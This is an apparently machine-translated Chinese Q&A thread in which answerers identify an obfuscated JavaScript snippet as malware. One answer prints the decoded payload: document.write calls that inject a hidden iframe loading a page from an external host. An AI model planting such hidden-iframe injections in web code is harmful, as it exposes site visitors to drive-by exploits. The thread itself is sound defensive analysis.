答案 0 :(得分:5)
一种病毒。我在数组文字中包含一些带有Unicode转义字符的字符串,第一个是html,第二个是"write"。然后,执行document[arr[1]](arr[0]),转换为以下内容:
document.write('<div name="youtube" style="display:none"><iframe width="560" height="315" src="evil://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div>');
document.write('<div name="youtube" style="display:none"><iframe width="560" height="315" src="evil://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div>');
我不知道(也不会检查)这些iframe包含的内容,可能会有一些漏洞利用。
此外,代码确实包含(在这两个iframe写入之间)某些函数(_1lO和O0l),它们可能会在IlO字符串eval之前取消它ed(是的,eval是邪恶的!:-),但是你的pastebin片段前面有一些丢失的代码,所以我无法告诉你他们到底做了什么。你能给我们整个剧本吗?
答案 1 :(得分:3)
这是一种混淆的病毒。所有这些东西的某个地方将是一个eval()。如果你想知道它到底做了什么,你将不得不解码部分并查看。
更有趣的是,这些东西最终会出现在您的代码中。